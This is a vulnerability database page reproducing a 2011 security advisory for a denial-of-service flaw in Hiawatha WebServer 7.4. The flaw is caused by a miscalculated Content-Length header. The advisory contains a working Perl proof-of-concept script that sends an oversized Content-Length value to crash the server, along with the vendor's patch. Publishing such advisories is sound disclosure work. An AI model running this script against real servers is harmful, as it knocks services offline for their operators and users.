Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Hiawatha WebServer 7.4 Denial Of Service

🗓️ 07 Mar 2011 00:00:00Reported by ipaxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Hiawatha WebServer 7.4 Denial Of Service vulnerability with Content-Length miscalculation can crash server with crafted HTTP request

Code
`[Discussion]  
- DcLabs Security Research Group advises about the following vulnerability(ies):  
  
[Software]  
- Hiawatha WebServer 7.4  
  
[Vendor Product Description]  
- Hiawatha is an open source webserver with a focus on security. I  
started Hiawatha in January 2002. Before that time, I had used several  
webservers, but I didn't like them. They had unlogical, almost cryptic  
configuration syntax and none of them gave me a good feeling about  
their security and robustness. So, I decided it was time to write my  
own webserver. I never thought that my webserver would become what it  
is today, but I enjoyed working on it and liked to have my own open  
source project. In the years that followed, Hiawatha became a fully  
functional webserver.  
  
- Source: http://www.hiawatha-webserver.org/files/hiawatha-7.4.tar.gz  
  
[Advisory Timeline]  
  
- 02/24/2011 -> Advisory sent to vendor.  
- 02/24/2011 -> Vendor response.  
- 02/25/2011 -> Patch suggested by vendor.  
- 03/04/2011 -> Advisory published.  
  
[Bug Summary]  
  
- Content-Length entity-header filed miscalculation.  
  
[Impact]  
  
- Low  
  
[Affected Version]  
  
- 7.4  
- Prior versions can also be affected but weren't tested.  
  
[Bug Description and Proof of Concept]  
  
- The web server crashes while sending specially crafted HTTP requests  
leading to Denial of Service.  
  
[PoC]  
  
# Hiawatha Web Server 7.4  
#!/usr/bin/perl  
use IO::Socket;  
if (@ARGV < 1) {  
usage();  
}  
$ip = $ARGV[0];  
$port = $ARGV[1];  
print "[+] Sending request...\n";  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr =>  
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";  
print $socket "OPTIONS * HTTP/1.1\r\n";  
print $socket "Host: http://www.dclabs.com.br\r\n";  
print $socket "Content-Length: 2147483599\r\n\r\n";  
sleep(3);  
close($socket);  
print "[+] Done!\n";  
  
sub usage() {  
print "[-] Usage: <". $0 ."> <host> <port>\n";  
print "[-] Example: ". $0 ." 127.0.0.1 80\n";  
exit;  
}  
  
All flaws described here were discovered and researched by:  
Rodrigo Escobar aka ipax.  
DcLabs Security Research Group  
ipax (at) dclabs <dot> com <dot> br  
  
[Patch(s) / Workaround]  
  
-- hiawatha.c --  
  
-- BEGIN --  
20a21  
> #include <limits.h>  
421c422  
< if  
(content_length < 0) {  
---  
> if ((content_length < 0) || (INT_MAX - content_length -2 <= header_length)) {  
-- END --  
  
[Greetz]  
  
DcLabs Security Research Group.  
  
--  
Rodrigo Escobar (ipax)  
Pentester/Researcher Security Team @ DcLabs  
http://www.dclabs.com.br  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Mar 2011 00:00Current
7.4High risk
Vulners AI Score7.4
hiawathawebserverdenial of servicevulnerabilitycontent-lengthmiscalculationcrashhttp requestssecuritypatchadvisorydclabs security research group
29